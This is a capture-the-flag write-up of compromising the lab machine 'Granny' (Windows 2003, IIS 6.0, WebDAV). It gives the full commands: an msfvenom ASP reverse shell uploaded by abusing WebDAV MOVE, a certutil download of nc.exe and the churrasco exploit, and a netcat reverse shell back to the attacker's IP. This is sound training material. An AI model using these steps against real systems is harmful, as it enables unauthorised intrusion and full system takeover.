Granny

Overview

Granny is a Windows 2003 box running IIS 6.0 and webdav. Webdav allowed anonymous uploads but required a bypass to upload an asp reverse shell. Once the shell was uploaded I got initial foothold by executing the uploaded file. I used an exploit called churrasco to call back to my machine with a shell as ‘nt authority\system’

Enumeration

Software

• Microsoft(R) Windows(R) Server 2003, Standard Edition
• Front Page Version - 5.0.2.6790

Port Scan

nmap -vv -Pn -sT -A -p- 10.10.10.15 -oN /mnt/data/boxes/granny/_full_tcp_nmap.txt

• 80/tcp - http

DavTest

davtest -url http://10.10.10.15

Steps (user)

Browsing to http://10.10.10.15 showed the default “Under Contruction” page and no other useful information.

According to the nmap scan this server was running webdav so I ran a scan with davtest which tests uploading different executable file types. There were quite a few different files that could be uploaded and only html and txt could be executed.

I connected to the server using a webdav client called cadaver. After running the help command I learned that the command “MOVE” was available. Using MOVE I was able to get around the restrictons by uploading a file with a .txt extension and renaming it to asp.

I created an asp reverse shell with msfvenom and output it to rshell.txt and started a netcat listener (rlwrap nc -lvnp 4200).

msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.24 lport=4200 -f asp > rshell.txt

I then connected to webdav via cadaver and uploaded rshell.txt

cadaver 10.10.10.15
put rshell.txt

With the file uploaded, I used ‘move’ to rename the file from rshell.txt to rshell.asp

move rshell.txt rshell.asp

I browsed to http://10.10.10.15/rshell.asp and received a shell as ‘nt authority\network service’

Steps (root/system)

The systeminfo command showed that only one hotfix was installed. I used a tool called Windows Exploit Suggester to identify which exploits the box was vulnerable to. The tool requires the output of the systeminfo command which I pasted to a file called “sysinfo.txt”

Windows-Exploit-Suggester github repo.

./windows-exploit-suggester.py -l --database 2019-11-17-mssb.xls --systeminfo sysinfo.txt

After not having any much luck with the windows-exploit suggester results, I tried an exploit called churrasco.

Additional info about churrasco

First I downloaded the exploit from Re4son’s github repo

wget https://github.com/Re4son/Churrasco/raw/master/churrasco.exe

In prepration to use the exploit to create a reverse shell with netcat, I copied the nc.exe binary to my working directory.

cp ~/tools/windows-binaries/nc.exe .

I started a reverse listener (nc -lvnp 42301) and started a python http server

python3 -m http.server 80

I downloaded the netcat and the exploit to the local box

certutil -urlcache -split -f http://10.10.14.24/nc.exe
certutil -urlcache -split -f http://10.10.14.24/churrasco.exe

The exploit was run, specifying the netcat command with my box’s IP/port resulting in a shell as ‘nt authority\system’

churrasco.exe "nc -e cmd 10.10.14.24 4201"